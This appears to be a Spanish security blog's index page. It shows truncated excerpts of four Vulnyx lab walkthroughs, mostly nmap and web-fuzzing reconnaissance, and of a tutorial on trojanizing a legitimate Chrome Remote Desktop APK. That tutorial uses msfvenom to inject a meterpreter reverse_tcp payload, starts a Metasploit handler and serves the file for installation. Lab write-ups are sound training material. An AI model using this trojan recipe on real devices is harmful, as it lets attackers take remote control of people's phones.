Entradas

Máquina Infected (Vulnyx)

Imagen
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover , para ello ejecutamos el siguiente comando: $ netdiscover -i eth1 -r 10.0.2.0/24 Kali (Máquina Atacante): 10.0.2.4 Máquina Victima: 10.0.2.9 Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando: $ ping -c 1 10.0.2.9 Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux . A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando: $ nmap -PN 10.0.2.9 -sVC Como podemos comprobar la Máquina Victima tiene abiertos los puertos 22 y 80 . Comprobamos que es lo que corre en el puerto 80. A continuación, realizamos con la herramienta gobuster un fuzzing web por extensiones de archivos .php , para ello ejecutamos el siguiente comando: $ gobuster dir -u http://10.0.2.9:80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-m...

Máquina Experience (Vulnyx)

Imagen
Comenzamos con averiguar la dirección IP de la Máquina Víctima, para ello utilizaremos la herramienta netdiscover , para ello ejecutamos el siguiente comando: $ netdiscover -i eth1 -r 10.0.2.0/24 Kali (Máquina Atacante): 10.0.2.4 Máquina Víctima: 10.0.2.8 Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando: $ ping -c 1 10.0.2.8 Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows . A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando: $ nmap -PN 10.0.2.8 -sVC Como podemos comprobar la Máquina Víctima tiene abiertos los puertos 135 , 139 y 445 ; y nos confirma que se trata de una Máquina con Windows XP . A continuación, comprobamos si el servicio que corre por el puerto 445 ( smb ) es vulnerable su versión, para ello usaremos el script vuln de nmap , para ello ejecutaremos el siguiente comando: $ nmap -p 445 10.0.2.8 --script vuln Y comprobam...

Máquina Basic (Vulnyx)

Imagen
Comenzamos con averiguar la dirección Ip de la Máquina Víctima, para ello utilizaremos la herramienta netdiscover , para ello ejecutamos el siguiente comando: $ netdiscover -i eth1 -r 10.0.2.0/24 Kali (Máquina Atacante): 10.0.2.4 Máquina Víctima: 10.0.2.7 Comprobamos si tenemos conexión con la Máquina Víctima, para ello ejecutamos el siguiente comando: $ ping -c 1 10.0.2.7 Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux . A continuación realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando: $ nmap -PN 10.0.2.7 -sVC Como podemos comprobar la Máquina Víctima tiene abiertos los puertos 22 , 80 y 631 . Comprobamos que es lo que corre en el puerto 631. A continuación, realizamos con la herramienta FFUF un fuzzing web, para ello ejecutamos el siguiente comando: $ ffuf -u http://10.0.2.7:631/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt Encontramos el directorio printers . A...

Máquina Shop (Vulnyx)

Imagen
Comenzamos con averiguar la dirección IP de la Máquina Víctima, para ello primeramente utilizaremos la herramienta netdiscover , para ello ejecutamos el siguiente comando: $ netdiscover -i eth1 -r 10.0.2.0/24 Kali (Máquina Atacante): 10.0.2.4 Máquina Víctima: 10.0.2.5 Comprobamos si tenemos conexión con la Máquina Víctima, para ello ejecutamos el siguiente comando: $ ping -c 1 10.0.2.5 Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux . A continuación realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando: $ nmap -PN 10.0.2.5 -sVC Como podemos comprobar la Máquina Víctima tiene abiertos los puertos  22 y 80 . Comprobamos que es lo que corre en el puerto 80. A continuación, realizamos con la herramienta FFUF un fuzzing web, para ello ejecutamos el siguiente comando: $ ffuz -u http://10.0.2.5:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt Encontramos el directorio ad...

Creación de una APK Maliciosa de una APK Legitima

Imagen
En esta ocasión vamos a crear un payload dentro de una APK legitima y establecer una sesión meterpreter en metasploit . Primeramente nos descargamos la APK legítima desde apkmirror , por ejemplo la de Chrome Remote Desktop . Pasamos la Apk legítima por la herramienta msfvenom , para ello ejecutaremos el siguiente comando: $ msfvenom -x chromeremotedesktop.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT= 4444 -o chromeremotedesktop_virus.apk Ahora con metasploit estaremos a la escucha con el multi handler , para ello ejecutaremos los siguientes comandos: msf6> use /multi/handler msf6> set payload android/meterpreter/reverse_tcp msf6> set LHOST 192.168.1.157 msf6> set LPORT 4444 msf6> run Nos compartimos la APK Maliciosa, para ello ejecutamos el siguiente comando situado en el mismo directorio donde se encuentra dicha APK Maliciosa: $ python3 -m http.server 8080 Nos la descargamos en el dispositivo Android y la instalamos. Como se puede comprobar Google ...